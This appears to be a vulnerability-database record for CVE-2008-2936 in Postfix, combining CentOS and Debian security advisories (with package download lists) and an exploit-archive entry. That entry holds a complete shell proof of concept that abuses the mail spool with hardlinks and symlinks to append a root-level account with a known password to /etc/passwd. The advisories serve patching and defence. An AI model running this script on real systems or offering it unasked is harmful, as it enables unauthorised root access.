advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027223.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027224.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027225.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027226.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027235.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027237.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027240.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-August/027243.html\n\n**Affected packages:**\npostfix\npostfix-pflogsumm\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0839.html", "edition": 4, "modified": "2008-08-23T15:42:47", "published": "2008-08-15T09:43:49", "href": "http://lists.centos.org/pipermail/centos-announce/2008-August/027223.html", "id": "CESA-2008:0839", "title": "postfix security update", "type": "centos", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:21:51", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1629-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nAugust 19, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : postfix\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-2936\n\nDue to a version numbering problem, the Postfix update for DSA 1629 was\nnot installable on the i386 (Intel ia32) architecture. This update\nincreases the version number to make it installable on i386 aswell.\nFor reference the original advisory text is below.\n\nSebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. Only a configuration meeting\nthe following requirements is vulnerable:\n * The mail delivery style is mailbox, with the Postfix built-in\n local(8) or virtual(8) delivery agents.\n * The mail spool directory (/var/spool/mail) is user-writeable.\n * The user can create hardlinks pointing to root-owned symlinks\n located in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor&#x27;s announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2+etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1.diff.gz\n Size/MD5 checksum: 187783 06817c1a9ac78db520c4a9856e1f606f\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8.orig.tar.gz\n Size/MD5 checksum: 2787761 a6c560657788fc7a5444fa9ea32f5513\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1.dsc\n Size/MD5 checksum: 1201 67cfbe6d62f54b03248610decf23430c\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-doc_2.3.8-2+etch1_all.deb\n Size/MD5 checksum: 784924 be2dfaabc9e4346fb211be9383c6b7b0\n http://security.debian.org/pool/updates/main/p/postfix/postfix-dev_2.3.8-2+etch1_all.deb\n Size/MD5 checksum: 130964 ee83b6a25f458aa3fe785202db29763c\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 38398 7a1047488b79e2e02f624d11014eeecf\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 38426 a016eeaf7033d0ac5eb07b999f2e6af7\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 36466 e0e5537af489daac95e2d74fdee07a6e\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 1148900 f631d16e8027a78c47ac6ab2c6503e56\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 43348 1daae02f16464e366f2386e4b82de1d9\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_amd64.deb\n Size/MD5 checksum: 38532 63a6da1adb632be43c7118e48ef6f5a6\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 45392 6d5ac13f7d0cd38c4568f5dce3b2de18\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 39720 89ed20f277270f74b7b6f7e92bb5b2b1\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 40194 8635fee29c0e8b661ea8cbd3bf6093e9\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 1174188 fee76ba8167cdffacd22445eca7396b2\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 37600 c3cddbeefe87b66277dccd6e2bd52f64\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_hppa.deb\n Size/MD5 checksum: 39922 572e0d5c09d39a34373d8340c2326b2b\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 1090008 e38c0784774c29bb313b8b7d77719782\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 36596 88af7c1ebb9d6ef8ff1ae1fe82892ca5\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 38456 3fd5eb9b366ff22b4a8c46b621a216df\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 38772 049c34f8a10e283505978c6be7255a7b\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 38864 440cb71e2a26168a938896ff2af1adc2\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_i386.deb\n Size/MD5 checksum: 43250 f5432050f81caf7e58f52cb48c22e7e1\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 47956 915c2fab14248e142187e5a613f274c9\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 38050 4b9c7bda45177283e157153d43633e43\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 40858 0cdb4f975d9a630f8df58c9cf124fbd1\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 41164 f0a564de59c461d0e0b667848a18a3f5\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 40856 3e9ad3317bf31270eaa686f84f7fb8bb\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_ia64.deb\n Size/MD5 checksum: 1439632 c341d7a699bbe6b13dc560e6f5b4cbbd\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 44290 4c9c2a9c614643bfe983d13b6423d423\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 40060 4804a7f44b861b6dbeb1a7294709c5ed\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 37822 11ba1ae93492801dc9de16b6130288d1\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 1167796 7a24c4ea8588e62178a5d2a1c4817f85\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 39902 363e664c54605ee838c6cf0c8fd9f790\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_powerpc.deb\n Size/MD5 checksum: 39758 a33b97afba4cfe193884cdf4a3543e03\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 43392 1318549e29ce2585850562abb98b07f7\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 38836 a76263d1e6715aa1294307bf581b6424\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 38454 00b3e98eb57590201dfe4d8775ce298b\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 39010 2d3a02a0e7c7a8ddbe9d0619fe4f8c7d\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 36654 82b473e570eff711781cc384e86636e2\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2+etch1_s390.deb\n Size/MD5 checksum: 1154442 64bf33d9dc4f14badb1c6397a74713f4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 7, "modified": "2008-08-19T09:02:20", "published": "2008-08-19T09:02:20", "id": "DEBIAN:DSA-1629-2:3AB83", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00215.html", "title": "[SECURITY] [DSA 1629-2] New postfix packages fix installability problem on i386", "type": "debian", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:29:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1629-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nAugust 18, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : postfix\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-2936\n\nSebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nThe default Debian installation of Postfix is not affected. Only a\nconfiguration meeting the following requirements is vulnerable:\n * The mail delivery style is mailbox, with the Postfix built-in\n local(8) or virtual(8) delivery agents.\n * The mail spool directory is user-writeable.\n * The user can create hardlinks pointing to root-owned symlinks\n located in other directories.\n\nFor a detailed treating of this issue, please refer to the upstream\nauthor&#x27;s announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8.orig.tar.gz\n Size/MD5 checksum: 2787761 a6c560657788fc7a5444fa9ea32f5513\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1.diff.gz\n Size/MD5 checksum: 177462 0827e61a7033e8625d92123c84b32782\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1.dsc\n Size/MD5 checksum: 907 8e9f0c462c57eb2be521714404474aca\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-dev_2.3.8-2etch1_all.deb\n Size/MD5 checksum: 130818 5038e376db1c661eb0284f96dff4761a\n http://security.debian.org/pool/updates/main/p/postfix/postfix-doc_2.3.8-2etch1_all.deb\n Size/MD5 checksum: 785408 5db9bdc0300637afd3d508afe2c261dc\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 1188364 c8c7f45763ccfd74b84335ea073c551c\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 36556 fcb1c6262baed1402032c2105b83d059\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 38746 a0d1334395beda433d586b63b0d60b80\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 43408 d9e830efc4532ccddc46f394232959a6\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 38596 855c8573280d5b191a12175b2e7afe8c\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_alpha.deb\n Size/MD5 checksum: 38928 579217f55db12977c61b8d437f3ab436\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 38318 24205dd0481bb1d78684167d8d20f44f\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 38338 50a46f34f638ea42525b98ca985b4f11\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 43268 a24dd35f2ec288c2c4f674099e44385f\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 1148848 f27f053dffd95b730f1186ed37ed8673\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 38460 907b2a8d84a54cdf31ade8c201d3780a\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_amd64.deb\n Size/MD5 checksum: 36378 1ab120583bcc5873a5350d9786282eab\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 42742 2d6799c7726a3943a39939baebacdc98\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 38324 6acd31d6ce0200fdd49043c99459c4c8\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 38394 52628e6399391671a8512ed25739813c\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 38592 1db4a21bb2c6f135e342b65317ecb897\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 1080626 3e05804bf0bf7101ae3e4eec33d1524f\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_arm.deb\n Size/MD5 checksum: 36378 71361b9cd3c008a9e96e8c23866b1a80\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 37504 76b3b4785a5e91fc1010ce32ccee31ed\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 45296 73bc72e54d6ef6909fd3df4266061d7b\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 40138 807908ccb69444d9aa1917861dc51af9\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 1174040 44260c5be83cd1d051de22c155aee72a\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 39814 547026b4994dfbf216be7f9ee0487054\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_hppa.deb\n Size/MD5 checksum: 39624 69209a3695bb1568f8c11e6ab4bb792d\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 36514 2c10b797c15b02828b344693d4f9c597\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 38680 d1beb196bcc090457a791760b5e7bdfd\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 38354 d074798f79b42bd245e13b8ce0f3adef\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 43160 40cc3fc2fc6374a07893321c2758a447\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 38770 d97f22246f4cb6cb48e4c993ad37daac\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_i386.deb\n Size/MD5 checksum: 1092656 30352104ad6fad91f13b996483e52e5b\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 37958 d3628d8f8d4fa6cc760ef77e21acb468\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 40762 6c5dcb7f2d6196ddf23a8e6d7b9e5f10\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 47878 bb8188e31d1a632164d1bb5dda88a810\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 1439608 cfc2f5db48f0f6bcc8ddb3e85a4032d6\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 40766 59cd143a5727868aaae30f309286a433\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_ia64.deb\n Size/MD5 checksum: 41066 385bf68a76cd27e12e012bf535a841e0\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 38194 014b70898f5aae21a95877c4e32f9941\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 36186 7c957d531808b35bd6994aeea448e213\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 38188 29a16989a6414ed3722f1422f46d9cd2\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 38446 0dc8cfc6f527161b8b4ce16dd8b297c6\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 1129132 4e6a95c1f4040b7b24ac18ab80455d4d\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_mips.deb\n Size/MD5 checksum: 42376 af1d25a56c756443db89f6aa6a7bbb38\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 37738 ee3c0924d5deb0d61741c9497156c0bf\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 44218 6ade57e38f9948016b71e6373f6f1863\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 39670 6a6597cfb2a225d05963a149386d8fcc\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 39774 3979adcff1c659588beb2e65c5ddb4d3\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 1167716 45d3590893a6b4c3efc99780508f92e1\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_powerpc.deb\n Size/MD5 checksum: 39966 7acc51d59c4c640b8c4963c09c573356\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 38752 56864ace555741a8e580ac9cdad129c3\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 1154368 f62e41e9b4d18eaaf76d0096370ceb1f\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 36562 9deaaf037d9694a5a09f01743c687a52\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 38360 6191ba334c80aa5e4dd12df40781c96d\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 43310 9a73eaee5cfd0b3656976a36c256e676\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_s390.deb\n Size/MD5 checksum: 38918 570c0d157fd6b6b4102122a965d3e6f6\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pgsql_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 38198 6ca537558089e41ebbdea7c90f2e4fd4\n http://security.debian.org/pool/updates/main/p/postfix/postfix-pcre_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 37906 746615a2cc165a0fcb5aff5be073e289\n http://security.debian.org/pool/updates/main/p/postfix/postfix-mysql_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 38058 ac84629509e45bf424752e4852e175e1\n http://security.debian.org/pool/updates/main/p/postfix/postfix-cdb_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 36106 55d00480a61daa52578d69081a4e93a6\n http://security.debian.org/pool/updates/main/p/postfix/postfix_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 1080776 87ff76ea63ba069b769b3491fac51670\n http://security.debian.org/pool/updates/main/p/postfix/postfix-ldap_2.3.8-2etch1_sparc.deb\n Size/MD5 checksum: 42910 767373c92a53b62640e69b16749f1fcc\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 13, "modified": "2008-08-18T20:51:36", "published": "2008-08-18T20:51:36", "id": "DEBIAN:DSA-1629-1:960C3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00214.html", "title": "[SECURITY] [DSA 1629-1] New postfix packages fix privilege escalation", "type": "debian", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPostfix 2.6-20080814 - symlink Local Privilege Escalation", "edition": 1, "published": "2008-08-31T00:00:00", "title": "Postfix 2.6-20080814 - symlink Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "id": "EXPLOITPACK:2DEE05799E2429D8CD17202F417BE030", "href": "", "sourceData": "#!/bin/sh\n#\n# \"rs_pocfix.sh\" (PoC for Postfix local root vulnerability: CVE-2008-2936)\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>\n#\n# Tested: Ubuntu / Debian\n#\n# [ Madrid, 30.Aug.2008 ]\n#\n\n# Config\n\nwritable_dir=/tmp\nspool_dir=/var/mail\t\t# Use \"postconf mail_spool_directory\" to obtain this\nuser=root\ntarget=/etc/passwd\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\nseconds=3\nuser_in_passwd=\"dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh\" # Pass is \"dsrrocks\"\npostfix=`which postfix`\t\t# /usr/sbin/postfix\npostconf=/usr/sbin/postconf\npostmap=/usr/sbin/postmap\n\n\n# Funcs\n\nquit()\n{\n echo \"$1\"\n exit\n}\n\n\n# Step 1: is my system vulnerable?\n\nhead -n 9 $0 | tail -n 8\nif [ $postfix ] ; then\n echo \"[*] Postfix seems to be installed\"\nelse\n quit \"[!] Are you sure Postfix is installed?\"\nfi\n\nmkdir -p $writable_dir/pocfix\ntouch $writable_dir/pocfix/src\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\n\nif [ -L $writable_dir/pocfix/dst2 ] ; then\n echo \"[*] Hardlink to symlink not dereferenced\"\n rm -rf $writable_dir/pocfix\nelse\n rm -rf $writable_dir/pocfix\n quit \"[!] Hardlink to symlink correctly dereferenced. System is not vulnerable\"\nfi\n\nif [ -d $spool_dir -a -w $spool_dir ] ; then\n echo \"[*] Spool dir is writable\"\nelse\n quit \"[!] Spool dir is not writable\"\nfi\n\nif [ -e $spool_dir/$user ] ; then\n rm -f $spool_dir/$user\n echo \"[*] Mailbox for \\\"$user\\\" found. Trying to delete it\"\n\n if [ -e $spool_dir/$user ] ; then\n quit \"[!] Couldn't delete it\"\n else\n echo \"[*] Deletion ok\"\n fi\n\nfi\n\nif [ -e $spool_dir/$useful_link_dst ] ; then\n rm -f $spool_dir/$useful_link_dst\n echo \"[*] Mailbox for \\\"$useful_link_dst\\\" found. Trying to delete it\"\n\n if [ -e $spool_dir/$useful_link_dst ] ; then\n quit \"[!] Couldn't delete it\"\n else\n echo \"[*] Deletion ok\"\n fi\n\nfi\n\naliases=`$postconf alias_database | cut -d\"=\" -f2`\n$postconf alias_maps | grep -q $aliases\nif [ $? -eq 0 ] ; then\n if [ $aliases ] ; then\n $postmap -q $user $aliases > /dev/null\n if [ $? -eq 0 ] ; then\n quit \"[!] Mail alias for \\\"$user\\\" exists\"\n fi\n fi\nfi\n\nlda=`$postconf mailbox_command | cut -d\"=\" -f2`\nif [ $lda ] ; then\n quit \"[!] Non-Postfix LDA detected\"\nfi \n\n$postconf home_mailbox | grep -q '/$'\nif [ $? -eq 0 ] ; then\n quit \"[!] Maildir-style mailbox detected\"\nfi\n\n\n# Step 2: Exploiting\n\nln -f $useful_link $spool_dir/$user 2> /dev/null || quit \"[!] Couldn't create hardlink (different partitions?)\"\nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit \"[!] Couldn't create symlink pointing to target file\"\ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo \"[*] Backed up: $target (saved as \\\"$writable_dir/pocfix_target_backup.$$\\\")\"\necho \"[*] Sending mail ($seconds seconds wait)\"\necho $user_in_passwd | /usr/sbin/sendmail $user\n\nsleep $seconds\n\ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null\n\nif [ $? -eq 0 ] ; then\n echo \"[!] Exploit failed\"\nelse\n echo \"[*] Exploit successful (appended data to $target). Now \\\"su dsr\\\", pass is \\\"dsrrocks\\\")\"\nfi\n\nrm -f $spool_dir/$user\nrm -f $spool_dir/$useful_link_dst\n\n# milw0rm.com 